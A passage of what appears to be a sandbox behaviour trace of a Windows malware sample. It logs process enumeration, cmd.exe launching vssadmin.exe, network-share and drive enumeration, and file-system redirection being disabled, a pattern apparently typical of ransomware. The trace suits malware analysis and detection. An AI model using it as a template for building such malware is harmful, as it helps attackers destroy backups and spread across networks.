| out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0061.002] lstrlenW (lpString="svchost.exe") returned 11 [0061.002] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0061.003] lstrlenW (lpString="taskeng.exe") returned 11 [0061.003] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0061.004] lstrlenW (lpString="taskhost.exe") returned 12 [0061.004] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0061.004] lstrlenW (lpString="called.exe") returned 10 [0061.004] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0061.005] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0061.005] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0061.006] lstrlenW (lpString="analyst.exe") returned 11 [0061.006] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0061.006] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0061.007] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0061.007] lstrlenW (lpString="wages.exe") returned 9 [0061.007] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0061.008] lstrlenW (lpString="rand.exe") returned 8 [0061.008] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0061.009] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0061.009] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0061.009] lstrlenW (lpString="cottage.exe") returned 11 [0061.009] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0061.010] lstrlenW (lpString="pairs_spec.exe") returned 14 [0061.010] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0061.011] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0061.011] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0061.011] lstrlenW (lpString="observationshairy.exe") returned 21 [0061.011] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0061.012] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0061.012] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0061.013] lstrlenW (lpString="spectrum.exe") returned 12 [0061.013] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0061.014] lstrlenW (lpString="dies.exe") returned 8 [0061.014] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0061.014] lstrlenW (lpString="configured.exe") returned 14 [0061.014] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0061.015] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0061.015] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0061.016] lstrlenW (lpString="fast.exe") returned 8 [0061.016] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0061.016] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0061.016] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0061.017] lstrlenW (lpString="review.exe") returned 10 [0061.017] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0061.018] lstrlenW (lpString="historybinding.exe") returned 18 [0061.018] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0061.019] lstrlenW (lpString="pk task surge.exe") returned 17 [0061.019] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0061.782] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0061.782] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0061.783] lstrlenW (lpString="ivttvf.exe") returned 10 [0061.783] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0061.783] lstrlenW (lpString="cmd.exe") returned 7 [0061.784] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.784] lstrlenW (lpString="conhost.exe") returned 11 [0061.784] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0061.785] lstrlenW (lpString="vssadmin.exe") returned 12 [0061.785] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0061.786] lstrlenW (lpString="VSSVC.exe") returned 9 [0061.786] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0061.786] lstrlenW (lpString="svchost.exe") returned 11 [0061.786] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0061.787] lstrlenW (lpString="LogonUI.exe") returned 11 [0061.787] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0061.788] CloseHandle (hObject=0x20c) returned 1 [0061.788] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0xaa8 [0031.737] WaitForSingleObject (hHandle=0x18fde4, dwMilliseconds=0xffffffff) returned 0xffffffff [0031.737] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4a30 | out: hHeap=0x570000) returned 1 Thread: id = 6 os_tid = 0xaac [0031.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a30 [0031.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a30, Size=0x20) returned 0x5a5c50 [0031.737] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5c50, Size=0x40) returned 0x5a6c30 [0031.737] GetLogicalDrives () returned 0x4 [0031.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5de498 [0031.738] GetComputerNameW (in: lpBuffer=0x5de49c, nSize=0x237ff6c | out: lpBuffer="XDUWTFONO", nSize=0x237ff6c) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5ee4a0 [0031.738] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x237ff3c | out: lphEnum=0x237ff3c*=0x5a61e0) returned 0x0 [0031.739] WNetEnumResourceW (in: hEnum=0x5a61e0, lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40) returned 0x103 [0031.739] WNetCloseEnum (hEnum=0x5a61e0) returned 0x0 [0031.739] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x237ff3c | out: lphEnum=0x237ff3c*=0x3ef1200) returned 0x0 [0036.374] WNetEnumResourceW (in: hEnum=0x3ef1200, lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40) returned 0x0 [0036.374] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x3f89520 [0036.374] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5ee4a0, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x5a6360) returned 0x0 [0036.698] WNetEnumResourceW (in: hEnum=0x5a6360, lpcCount=0x237ff0c, lpBuffer=0x3f89520, lpBufferSize=0x237ff14 | out: lpcCount=0x237ff0c, lpBuffer=0x3f89520, lpBufferSize=0x237ff14) returned 0x103 [0036.698] WNetCloseEnum (hEnum=0x5a6360) returned 0x0 [0036.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x3f85500 [0036.698] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5ee4c0, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x0) returned 0x4b8 [0056.830] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x3f9e5c8 [0056.830] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x5ee4e0, lphEnum=0x237ff10 | out: lphEnum=0x237ff10*=0x0) returned 0x4c6 [0057.715] WNetEnumResourceW (in: hEnum=0x3ef1200, lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40 | out: lpcCount=0x237ff38, lpBuffer=0x5ee4a0, lpBufferSize=0x237ff40) returned 0x103 [0057.715] WNetCloseEnum (hEnum=0x3ef1200) returned 0x0 [0057.715] GetLogicalDrives () returned 0x4 [0057.716] Sleep (dwMilliseconds=0x64) [0057.851] GetLogicalDrives () returned 0x4 [0057.851] Sleep (dwMilliseconds=0x64) [0058.013] GetLogicalDrives () returned 0x4 [0058.013] Sleep (dwMilliseconds=0x64) [0059.050] GetLogicalDrives () returned 0x4 [0059.050] Sleep (dwMilliseconds=0x64) [0059.531] GetLogicalDrives () returned 0x4 [0059.536] Sleep (dwMilliseconds=0x64) [0060.052] GetLogicalDrives () returned 0x4 [0060.053] Sleep (dwMilliseconds=0x64) [0060.250] GetLogicalDrives () returned 0x4 [0060.250] Sleep (dwMilliseconds=0x64) [0060.493] GetLogicalDrives () returned 0x4 [0060.493] Sleep (dwMilliseconds=0x64) [0060.981] GetLogicalDrives () returned 0x4 [0060.981] Sleep (dwMilliseconds=0x64) [0061.793] GetLogicalDrives () returned 0x4 [0061.793] Sleep (dwMilliseconds=0x64) Thread: id = 7 os_tid = 0xab0 [0031.740] GetTickCount () returned 0x1816e [0031.740] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x5cb330 [0031.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5cb330, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120 [0031.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5cb330, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124 [0031.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5cb330, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0031.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5cb330, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0031.804] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c01c8 [0031.804] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c01c8, Size=0x20) returned 0x5a5c00 [0031.804] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c01c8 [0031.804] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c01c8, Size=0x20) returned 0x5a5b88 [0031.804] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.333] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.333] Wow64DisableWow64FsRedirection (in: OldValue=0x24bff84 | out: OldValue=0x24bff84*=0x0) returned 1 [0032.333] lstrlenW (lpString="kernel32.dll") returned 12 [0032.333] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c00 | out: hHeap=0x570000) returned 1 [0032.333] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.333] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5b88 | out: hHeap=0x570000) returned 1 [0032.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x5ab428, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0032.335] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0032.619] GetTickCount () returned 0x182f4 [0032.619] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0032.999] GetTickCount () returned 0x1840d [0032.999] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0033.303] GetTickCount () returned 0x18545 [0033.303] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0033.562] GetTickCount () returned 0x18610 [0033.562] GetTickCount () returned 0x18610 [0033.562] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0034.378] GetTickCount () returned 0x187a5 [0034.387] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0034.878] GetTickCount () returned 0x18999 [0034.878] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0035.436] GetTickCount () returned 0x18bbb [0035.436] GetTickCount () returned 0x18bbb [0035.436] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.045] GetTickCount () returned 0x18e1b [0036.045] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.434] GetTickCount () returned 0x18fa1 [0036.434] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0036.747] GetTickCount () returned 0x190ba [0036.747] GetTickCount () returned 0x190ba [0036.747] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0037.112] GetTickCount () returned 0x191e2 [0037.112] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0037.660] GetTickCount () returned 0x193e5 [0037.660] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0038.228] GetTickCount () returned 0x19626 [0038.228] GetTickCount () returned 0x19626 [0038.228] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0038.568] GetTickCount () returned 0x1974f [0038.568] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.087] GetTickCount () returned 0x19903 [0039.087] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.476] GetTickCount () returned 0x19a89 [0039.476] GetTickCount () returned 0x19a89 [0039.476] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.769] GetTickCount () returned 0x19b83 [0039.769] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0039.927] GetTickCount () returned 0x19c1f [0039.927] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.152] GetTickCount () returned 0x19d09 [0040.152] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0040.642] GetTickCount () returned 0x19ebe [0040.642] GetTickCount () returned 0x19ebe [0040.642] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0041.114] GetTickCount () returned 0x1a044 [0041.114] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0041.505] GetTickCount () returned 0x1a1ab [0041.505] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0041.929] GetTickCount () returned 0x1a350 [0041.929] GetTickCount () returned 0x1a350 [0041.929] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.175] GetTickCount () returned 0x1a40b [0042.175] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.486] GetTickCount () returned 0x1a543 [0042.486] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0042.925] GetTickCount () returned 0x1a66b [0042.925] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0043.274] GetTickCount () returned 0x1a7a3 [0043.274] GetTickCount () returned 0x1a7a3 [0043.274] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0043.721] GetTickCount () returned 0x1a968 [0043.721] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.025] GetTickCount () returned 0x1aa90 [0044.025] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.309] GetTickCount () returned 0x1aba9 [0044.309] GetTickCount () returned 0x1aba9 [0044.309] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.740] GetTickCount () returned 0x1ad5e [0044.740] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0044.933] GetTickCount () returned 0x1ae19 [0044.933] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.116] GetTickCount () returned 0x1aed4 [0045.116] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.344] GetTickCount () returned 0x1afbe [0045.344] GetTickCount () returned 0x1afbe [0045.344] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0045.737] GetTickCount () returned 0x1b144 [0045.737] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.024] GetTickCount () returned 0x1b25d [0046.024] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.454] GetTickCount () returned 0x1b412 [0046.454] GetTickCount () returned 0x1b412 [0046.454] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0046.686] GetTickCount () returned 0x1b4fc [0046.686] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.222] GetTickCount () returned 0x1b70e [0047.222] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0047.789] GetTickCount () returned 0x1b940 [0047.789] GetTickCount () returned 0x1b940 [0047.789] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.259] GetTickCount () returned 0x1bb23 [0048.259] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.604] GetTickCount () returned 0x1bc7b [0048.604] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0048.723] GetTickCount () returned 0x1bce8 [0048.723] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.070] GetTickCount () returned 0x1be4f [0049.070] GetTickCount () returned 0x1be4f [0049.070] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0049.275] GetTickCount () returned 0x1bf19 [0049.275] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.199] GetTickCount () returned 0x1c2b2 [0050.199] GetTickCount () returned 0x1c2b2 [0050.199] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.420] GetTickCount () returned 0x1c38c [0050.420] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0050.986] GetTickCount () returned 0x1c5be [0050.988] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0051.353] GetTickCount () returned 0x1c734 [0051.353] GetTickCount () returned 0x1c734 [0051.353] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0051.687] GetTickCount () returned 0x1c8e9 [0051.790] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.347] GetTickCount () returned 0x1cb1b [0052.348] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.509] GetTickCount () returned 0x1cbb7 [0052.509] GetTickCount () returned 0x1cbb7 [0052.509] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.710] GetTickCount () returned 0x1cc81 [0052.710] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0052.906] GetTickCount () returned 0x1cd3d [0052.906] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.182] GetTickCount () returned 0x1ce55 [0053.182] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.601] GetTickCount () returned 0x1cffb [0053.601] GetTickCount () returned 0x1cffb [0053.601] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0053.765] GetTickCount () returned 0x1d097 [0053.765] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.237] GetTickCount () returned 0x1d27a [0054.237] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0054.600] GetTickCount () returned 0x1d3e1 [0054.600] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.017] GetTickCount () returned 0x1d586 [0055.018] GetTickCount () returned 0x1d586 [0055.023] WaitForSingleObject 